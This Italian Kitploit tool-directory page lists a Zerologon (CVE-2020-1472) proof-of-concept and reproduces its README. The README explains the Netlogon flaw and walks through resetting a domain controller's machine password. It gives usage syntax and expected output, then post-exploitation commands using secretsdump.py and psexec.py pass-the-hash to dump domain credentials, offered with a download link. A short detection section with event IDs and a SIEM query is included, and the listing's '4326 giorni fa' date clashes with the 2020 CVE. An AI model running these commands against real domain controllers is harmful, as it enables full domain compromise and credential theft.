Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) applicazione Proof-of-Concept - strumento per lo sfruttamento di una vulnerabilità critica di Active Directory. | Kitploit
Strumenti/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingPaper e RicercaApprendimento e FormazioneRed Teaming
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) applicazione Proof-of-Concept - strumento per lo sfruttamento di una vulnerabilità critica di Active Directory.

4326 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Zerologon (CVE-2020-1472)

Panoramica

Questo progetto è un'implementazione della vulnerabilità Zerologon (CVE-2020-1472), una delle vulnerabilità più critiche per la sicurezza di Active Directory. Questa vulnerabilità consente a un attaccante non autenticato di compromettere l'intero dominio Active Directory reimpostando la password dell'account macchina del Domain Controller.

Punteggio CVSS: 10.0 (Critico)

Cos'è Zerologon?

Zerologon è un difetto crittografico nel Netlogon Remote Protocol (MS-NRPC) di Microsoft. La vulnerabilità risiede nel modo in cui Netlogon utilizza la crittografia AES-CFB8 con un vettore di inizializzazione (IV) hardcoded pari a zero.

Riepilogo tecnico:

  • Il protocollo Netlogon utilizza un meccanismo di autenticazione challenge-response
  • A causa di un'implementazione crittografica impropria, una challenge composta da tutti zeri ha 1 probabilità su 256 di produrre un'autenticazione valida
  • Un attaccante può inviare circa 2000 tentativi di autenticazione per sfruttare in modo affidabile questo difetto
  • Una volta autenticato, l'attaccante può reimpostare la password dell'account macchina del Domain Controller a un valore noto (hash vuoto)

Come funziona

root@kitploit:~
1. Target Selection
   └─> Identify Domain Controller (FQDN, NetBIOS name, machine account)

2. Challenge Phase (I_NetServerReqChallenge)
   └─> Send all-zero client challenge (0x0000000000000000)
   └─> Receive server challenge

3. Authentication Phase (I_NetServerAuthenticate2)
   └─> Attempt authentication with null credentials
   └─> Repeat until successful (~1/256 success rate per attempt)

4. Password Reset Phase (I_NetServerPasswordSet2)
   └─> Reset DC machine account password to empty
   └─> New NT hash: 31d6cfe0d16ae931b73c59d7e0c089c0 (empty password)

5. Post-Exploitation
   └─> Use Pass-the-Hash with empty credentials
   └─> Full domain compromise achieved

Compilazione del Progetto

Prerequisiti

  • Ambiente di sviluppo Windows (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

Compilazione

Con Visual Studio:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

Utilizzo

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

Esempio:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

Parametri:

  • DC_FQDN: Nome di dominio completo (FQDN) del Domain Controller target
  • DC_NetBIOS_Name: Nome NetBIOS del DC (di solito hostname)
  • Machine_Account_Name: Nome dell'account macchina (deve terminare con $)

Output atteso:

Sfruttamento riuscito:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

Sfruttamento fallito (sistema patchato):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

Post-sfruttamento

Dopo aver reimpostato con successo la password del DC, è possibile:

  1. Estrarre le credenziali di dominio:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Autenticazione Pass-the-Hash:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

Rilevamento

Rilevamento di rete:

  • Molteplici tentativi di autenticazione Netlogon falliti da un'unica origine
  • Schemi insoliti nel traffico MS-NRPC
  • Firme IDS/IPS per lo sfruttamento di Zerologon

Rilevamento basato sui log:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

Query SIEM:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

Disclaimer

Questo strumento è fornito esclusivamente a scopo educativo e per ricerca sulla sicurezza autorizzata.

L'autore non si assume alcuna responsabilità per l'uso improprio di questo codice.

Riferimenti

Risorse ufficiali:

  • CVE-2020-1472 - NIST
  • Avviso di sicurezza Microsoft
  • Articolo di ricerca Secura

Analisi tecnica:

  • Specifica del protocollo Netlogon di Microsoft
  • Approfondimento tecnico su Zerologon

Strumenti:

  • Impacket Toolkit - Per il post-sfruttamento
  • Mimikatz - Estrazione delle credenziali

Licenza

Questo progetto è concesso in licenza sotto la MIT License. Per maggiori informazioni, consulta il file LICENSE.

Scarica lo strumento